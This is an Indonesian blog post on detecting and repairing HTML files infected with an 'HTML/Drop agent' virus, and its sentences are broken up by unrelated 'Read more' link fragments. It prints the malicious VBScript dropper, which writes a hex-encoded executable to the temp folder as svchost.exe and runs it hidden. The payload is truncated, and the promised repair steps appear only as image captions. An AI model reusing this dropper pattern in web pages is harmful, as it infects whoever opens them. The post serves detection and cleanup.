Merepair File yang terkena virus HTML/Drop agent

Pada sebagian orang yangPengumuman Calon Asisten Praktikum Basisdata. Read more ... » gemar membuat website tentunya tidak asing lagi denganTUGAS STRUKTUR DATA KELAS SAMI. Read more ... » format extensi *.html / *.htm, sekedar pengalaman gak tau kenapa file extensi*.html yang ada di flash ternyata terhapus semua oleh antivirusAnti Virus HP / Symbian. Read more ... » Avira, wah padahal tugasTUGAS STRUKTUR DATA KELAS SAMI. Read more ... » web numpuk, setelah diselidiki ternya file html tersebut telah diinjeksi virusMenghapus Virus new Heur Level 9. Read more ... » dropper html. UntukBasic Pattern Recognition. Read more ... » mengecek ada tidaknya virus ini cukup mudah, buka file html dan periksa pada baris terakhir jika ada source berikut, otomatis file html terkena drop agent. Berikut potongan code virus :

<SCRIPT language="VBScript"><! --
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000B8000000 // dipotong coz terlalu panjang...
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//-->

Permasalahannya, avira belum mampu merepair file tersebut, sehingga antivirus otomatis akan mendelete, untuk merepair caranya ikuti langkah berikut :

Berikut adalah tampilan gambarnya :
Membuka file dropper

Scan HTML DROP AGENT

Selamat Mencoba by 1n53ct4

Posted in Hacking, Security, Windows and tagged , .